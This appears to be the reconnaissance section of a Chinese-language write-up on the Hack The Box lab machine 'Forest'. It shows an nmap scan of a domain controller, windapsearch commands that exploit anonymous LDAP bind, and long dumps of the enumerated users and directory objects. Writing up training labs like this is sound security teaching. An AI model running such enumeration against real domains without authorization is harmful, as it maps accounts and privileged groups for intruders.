信息收集
使用nmap扫描发现域控服务器(10.10.10.161)
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-23 14:32:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1296/tcp filtered dproxy
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Aggressive OS guesses: Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Server 2012 (92%), Microsoft Windows Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%), Microsoft Windows Server 2016 build 10586 - 14393 (92%), Microsoft Windows Server 2012 or Server 2012 R2 (91%), Microsoft Windows 10 1507 - 1607 (90%), Microsoft Windows Server 2016 (90%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
尝试使用kali下的windapsearch检查ldap匿名绑定
windapsearch安装
https://github.com/Mephostophiles/windapsearch
pip install python-ldap #or apt-get install python-ldap
如果安装python-ldap报错
apt-get update
apt-get install libsasl2-dev python3-dev libldap2-dev libssl-dev
命令:python windapsearch.py -d hb.local --dc-ip 10.10.10.161 -U
-U枚举用户,发现ldap可以匿名绑定并且枚举用户
扫描结果:
python windapsearch.py -d hb.local --dc-ip 10.10.10.161 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.161
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD users
[+] Found 28 users:
cn: Guest
cn: DefaultAccount
cn: Exchange Online-ApplicationAccount
userPrincipalName: Exchange_Online-ApplicationAccount@htb.local
cn: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}
userPrincipalName: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local
cn: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}
userPrincipalName: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local
cn: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}
userPrincipalName: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local
cn: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}
userPrincipalName: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local
cn: Migration.8f3e7716-2011-43e4-96b1-aba62d229136
userPrincipalName: Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.local
cn: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042
userPrincipalName: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.local
cn: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}
userPrincipalName: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local
cn: SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}
userPrincipalName: SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@htb.local
cn: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}
userPrincipalName: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@htb.local
cn: HealthMailboxc3d7722415ad41a5b19e3e00e165edbe
userPrincipalName: HealthMailboxc3d7722415ad41a5b19e3e00e165edbe@htb.local
cn: HealthMailboxfc9daad117b84fe08b081886bd8a5a50
userPrincipalName: HealthMailboxfc9daad117b84fe08b081886bd8a5a50@htb.local
cn: HealthMailboxc0a90c97d4994429b15003d6a518f3f5
userPrincipalName: HealthMailboxc0a90c97d4994429b15003d6a518f3f5@htb.local
cn: HealthMailbox670628ec4dd64321acfdf6e67db3a2d8
userPrincipalName: HealthMailbox670628ec4dd64321acfdf6e67db3a2d8@htb.local
cn: HealthMailbox968e74dd3edb414cb4018376e7dd95ba
userPrincipalName: HealthMailbox968e74dd3edb414cb4018376e7dd95ba@htb.local
cn: HealthMailbox6ded67848a234577a1756e072081d01f
userPrincipalName: HealthMailbox6ded67848a234577a1756e072081d01f@htb.local
cn: HealthMailbox83d6781be36b4bbf8893b03c2ee379ab
userPrincipalName: HealthMailbox83d6781be36b4bbf8893b03c2ee379ab@htb.local
cn: HealthMailboxfd87238e536e49e08738480d300e3772
userPrincipalName: HealthMailboxfd87238e536e49e08738480d300e3772@htb.local
cn: HealthMailboxb01ac647a64648d2a5fa21df27058a24
userPrincipalName: HealthMailboxb01ac647a64648d2a5fa21df27058a24@htb.local
cn: HealthMailbox7108a4e350f84b32a7a90d8e718f78cf
userPrincipalName: HealthMailbox7108a4e350f84b32a7a90d8e718f78cf@htb.local
cn: HealthMailbox0659cc188f4c4f9f978f6c2142c4181e
userPrincipalName: HealthMailbox0659cc188f4c4f9f978f6c2142c4181e@htb.local
cn: Sebastien Caron
userPrincipalName: sebastien@htb.local
cn: Lucinda Berger
userPrincipalName: lucinda@htb.local
cn: Andy Hislip
userPrincipalName: andy@htb.local
cn: Mark Brandt
userPrincipalName: mark@htb.local
cn: Santi Rodriguez
userPrincipalName: santi@htb.local
使用windapsearch查询objectClass=*筛选其他对象
命令:python windapsearch.py -d hb.local --dc-ip 10.10.10.161 --custom "objectClass=*"
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.161
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Performing custom lookup with filter: "objectClass=*"
[+] Found 312 results:
DC=htb,DC=local
CN=Users,DC=htb,DC=local
CN=Allowed RODC Password Replication Group,CN=Users,DC=htb,DC=local
CN=Denied RODC Password Replication Group,CN=Users,DC=htb,DC=local
CN=Read-only Domain Controllers,CN=Users,DC=htb,DC=local
CN=Enterprise Read-only Domain Controllers,CN=Users,DC=htb,DC=local
CN=Cloneable Domain Controllers,CN=Users,DC=htb,DC=local
CN=Protected Users,CN=Users,DC=htb,DC=local
CN=Key Admins,CN=Users,DC=htb,DC=local
CN=Enterprise Key Admins,CN=Users,DC=htb,DC=local
CN=DnsAdmins,CN=Users,DC=htb,DC=local
CN=DnsUpdateProxy,CN=Users,DC=htb,DC=local
CN=Exchange Online-ApplicationAccount,CN=Users,DC=htb,DC=local
CN=SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1},CN=Users,DC=htb,DC=local
CN=SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c},CN=Users,DC=htb,DC=local
CN=SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9},CN=Users,DC=htb,DC=local
CN=DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852},CN=Users,DC=htb,DC=local
CN=Migration.8f3e7716-2011-43e4-96b1-aba62d229136,CN=Users,DC=htb,DC=local
CN=FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042,CN=Users,DC=htb,DC=local
CN=SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201},CN=Users,DC=htb,DC=local
CN=SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA},CN=Users,DC=htb,DC=local
CN=SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9},CN=Users,DC=htb,DC=local
CN=Administrator,CN=Users,DC=htb,DC=local
CN=Guest,CN=Users,DC=htb,DC=local
CN=DefaultAccount,CN=Users,DC=htb,DC=local
CN=krbtgt,CN=Users,DC=htb,DC=local
CN=Domain Computers,CN=Users,DC=htb,DC=local
CN=Domain Controllers,CN=Users,DC=htb,DC=local
CN=Schema Admins,CN=Users,DC=htb,DC=local
CN=Enterprise Admins,CN=Users,DC=htb,DC=local
CN=Cert Publishers,CN=Users,DC=htb,DC=local
CN=Domain Admins,CN=Users,DC=htb,DC=local
CN=Domain Users,CN=Users,DC=htb,DC=local
CN=Domain Guests,CN=Users,DC=htb,DC=local
CN=Group Policy Creator Owners,CN=Users,DC=htb,DC=local
CN=RAS and IAS Servers,CN=Users,DC=htb,DC=local
CN=Computers,DC=htb,DC=local
CN=EXCH01,CN=Computers,DC=htb,DC=local
OU=Domain Controllers,DC=htb,DC=local
CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
CN=RID Set,CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
CN=DFSR-LocalSettings,CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
CN=Domain System Volume,CN=DFSR-LocalSettings,CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
CN=SYSVOL Subscription,CN=Domain System Volume,CN=DFSR-LocalSettings,CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
CN=System,DC=htb,DC=local
CN=WinsockServices,CN=System,DC=htb,DC=local
CN=RpcServices,CN=System,DC=htb,DC=local
CN=FileLinks,CN=System,DC=htb,DC=local
CN=VolumeTable,CN=FileLinks,CN=System,DC=htb,DC=local
CN=ObjectMoveTable,CN=FileLinks,CN=System,DC=htb,DC=local
CN=Default Domain Policy,CN=System,DC=htb,DC=local
CN=AppCategories,CN=Default Domain Policy,CN=System,DC=htb,DC=local
CN=RID Manager$,CN=System,DC=htb,DC=local
CN=Meetings,CN=System,DC=htb,DC=local
CN=Policies,CN=System,DC=htb,DC=local
CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=htb,DC=local
CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=htb,DC=local
CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=@,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=A.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=B.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=C.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=D.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=E.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=F.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=G.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=H.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=I.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=J.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=K.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=L.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=M.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
CN=RAS and IAS Servers Access Check,CN=System,DC=htb,DC=local
CN=File Replication Service,CN=System,DC=htb,DC=local
CN=Dfs-Configuration,CN=System,DC=htb,DC=local
CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecPolicy{72385230-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecISAKMPPolicy{72385231-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{72385232-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{59319BE2-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{594272E2-071D-11D3-AD22-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNegotiationPolicy{72385233-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecFilter{7238523A-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNegotiationPolicy{59319BDF-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNegotiationPolicy{7238523B-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecFilter{72385235-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecPolicy{72385236-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecISAKMPPolicy{72385237-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{59319C04-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNegotiationPolicy{59319C01-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecPolicy{7238523C-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecISAKMPPolicy{7238523D-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{7238523E-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{59319BF3-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{594272FD-071D-11D3-AD22-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNegotiationPolicy{7238523F-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNegotiationPolicy{59319BF0-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{6A1F5C6F-72B7-11D2-ACF0-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=local
CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=local
CN=Content,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=local
CN=SYSVOL Share,CN=Content,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=local
CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=local
CN=FOREST,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=local
CN=AdminSDHolder,CN=System,DC=htb,DC=local
CN=ComPartitions,CN=System,DC=htb,DC=local
CN=ComPartitionSets,CN=System,DC=htb,DC=local
CN=WMIPolicy,CN=System,DC=htb,DC=local
CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6E157EDF-4E72-4052-A82A-EC3F91021A22,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=ab402345-d3c3-455d-9ff7-40268a1099b6,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=bab5f54d-06c8-48de-9b87-d78b796564e4,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=f3dd09dd-25e8-4f9c-85df-12d6d2f2f2f5,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=2416c60a-fe15-4d7a-a61e-dffd5df864d3,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=7868d4c8-ac41-4e05-b401-776280e8e9f1,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=860c36ed-5241-4c62-a18b-cf6ff9994173,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=0e660ea3-8a5e-4495-9ad7-ca1bd4638f9e,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=a86fe12a-0f62-4e2a-b271-d27f601f8182,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=d85c0bfd-094f-4cad-a2b5-82ac9268475d,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6ada9ff7-c9df-45c1-908e-9fef2fab008a,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=10b3ad2a-6883-4fa7-90fc-6377cbdc1b26,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=98de1d3e-6611-443b-8b4e-f4337f1ded0b,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=f607fd87-80cf-45e2-890b-6cf97ec0e284,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=9cac1f66-2167-47ad-a472-2a13251310e4,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6ff880d6-11e7-4ed1-a20f-aac45da48650,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=446f24ea-cfd5-4c52-8346-96e170bcb912,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=51cba88b-99cf-4e16-bef2-c427b38d0767,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=a3dac986-80e7-4e59-a059-54cb1ab43cb9,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=293f0798-ea5c-4455-9f5d-45f33a30703b,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=5c82b233-75fc-41b3-ac71-c69592e6bf15,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=7ffef925-405b-440a-8d58-35e8cd6e98c3,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=4dfbb973-8a62-4310-a90c-776e00f83222,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=8437C3D8-7689-4200-BF38-79E4AC33DFA0,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=7cfb016c-4f87-4406-8166-bd9df943947f,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=f7ed4553-d82b-49ef-a839-2f38a36bb069,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=8ca38317-13a4-4bd4-806f-ebed6acb5d0c,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=3c784009-1f57-4e2a-9b04-6915c9e71961,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5678-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5679-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd567a-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd567b-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd567c-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd567d-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd567e-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd567f-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5680-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5681-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5682-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5683-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5684-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5685-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5686-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5687-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5688-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5689-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd568a-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd568b-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd568c-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd568d-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=3051c66f-b332-4a73-9a20-2d6a7d6e6a1c,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=3e4f4182-ac5d-4378-b760-0eab2de593e2,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=c4f17608-e611-11d6-9793-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=13d15cf0-e6c8-11d6-9793-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=8ddf6913-1c7b-4c59-a5af-b9ca3b3d2c4c,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=dda1d01d-4bd7-4c49-a184-46f9241b560e,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=a1789bfb-e0a2-4739-8cc0-e77d892d080a,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=61b34cb0-55ee-4be9-b595-97810b92b017,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=57428d75-bef7-43e1-938b-2e749f5a8d56,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=ebad865a-d649-416f-9922-456b53bbb5b8,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=0b7fb422-3609-4587-8c2e-94b10f67d1bf,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=2951353e-d102-4ea5-906c-54247eeec741,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=71482d49-8870-4cb3-a438-b6fc9ec35d70,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=aed72870-bf16-4788-8ac7-22299c8207f1,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=f58300d1-b71a-4DB6-88a1-a8b9538beaca,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=231fb90b-c92a-40c9-9379-bacfc313a3e3,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=4aaabc3a-c416-4b9c-a6bb-4b453ab1c1f0,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=9738c400-7795-4d6e-b19d-c16cd6486166,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=de10d491-909f-4fb0-9abb-4b7865c0fe80,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=b96ed344-545a-4172-aa0c-68118202f125,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=4c93ad42-178a-4275-8600-16811d28f3aa,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=c88227bc-fcca-4b58-8d8a-cd3d64528a02,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=5e1574f6-55df-493e-a671-aaeffca6a100,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=d262aae8-41f7-48ed-9f35-56bbb677573d,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=82112ba0-7e4c-4a44-89d9-d46c9612bf91,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=c3c927a6-cc1d-47c0-966b-be8f9b63d991,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=54afcfb9-637a-4251-9f47-4d50e7021211,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=f4728883-84dd-483c-9897-274f2ebcf11e,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=ff4f9d27-7157-4cb0-80a9-5d6f2b14c8ff,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=83C53DA7-427E-47A4-A07A-A324598B88F7,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=C81FC9CC-0130-4FD1-B272-634D74818133,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=E5F9E791-D96D-4FC9-93C9-D53E1DC439BA,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=e6d5fd00-385d-4e65-b02d-9da3493ed850,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=3a6b3fbf-3168-4312-a10d-dd5b3393952d,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=7F950403-0AB3-47F9-9730-5D7B0269F9BD,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=434bb40d-dbc9-4fe7-81d4-d57229f7b080,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=Windows2003Update,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=ActiveDirectoryUpdate,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=BCKUPKEY_bcb64993-1db6-45d5-9b0d-b8186e8ee6a4 Secret,CN=System,DC=htb,DC=local
CN=BCKUPKEY_P Secret,CN=System,DC=htb,DC=local
CN=BCKUPKEY_b5b09264-b153-45ba-9501-e0f2b84c57a7 Secret,CN=System,DC=htb,DC=local
CN=BCKUPKEY_PREFERRED Secret,CN=System,DC=htb,DC=local
CN=Password Settings Container,CN=System,DC=htb,DC=local
CN=PSPs,CN=System,DC=htb,DC=local
CN=Server,CN=System,DC=htb,DC=local
CN=LostAndFound,DC=htb,DC=local
CN=Infrastructure,DC=htb,DC=local
CN=ForeignSecurityPrincipals,DC=htb,DC=local
CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=htb,DC=local
CN=S-1-5-7,CN=ForeignSecurityPrincipals,DC=htb,DC=local
CN=S-1-1-0,CN=ForeignSecurityPrincipals,DC=htb,DC=local
CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=htb,DC=local
CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=htb,DC=local
CN=S-1-5-17,CN=ForeignSecurityPrincipals,DC=htb,DC=local
CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailboxc3d7722415ad41a5b19e3e00e165edbe,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=ExchangeActiveSyncDevices,CN=HealthMailboxc3d7722415ad41a5b19e3e00e165edbe,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=EASProbeDeviceType§EASProbeDeviceId141,CN=ExchangeActiveSyncDevices,CN=HealthMailboxc3d7722415ad41a5b19e3e00e165edbe,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailboxfc9daad117b84fe08b081886bd8a5a50,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=ExchangeActiveSyncDevices,CN=HealthMailboxfc9daad117b84fe08b081886bd8a5a50,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=EASProbeDeviceType§EASProbeDeviceId141,CN=ExchangeActiveSyncDevices,CN=HealthMailboxfc9daad117b84fe08b081886bd8a5a50,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailboxc0a90c97d4994429b15003d6a518f3f5,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailbox670628ec4dd64321acfdf6e67db3a2d8,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailbox968e74dd3edb414cb4018376e7dd95ba,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
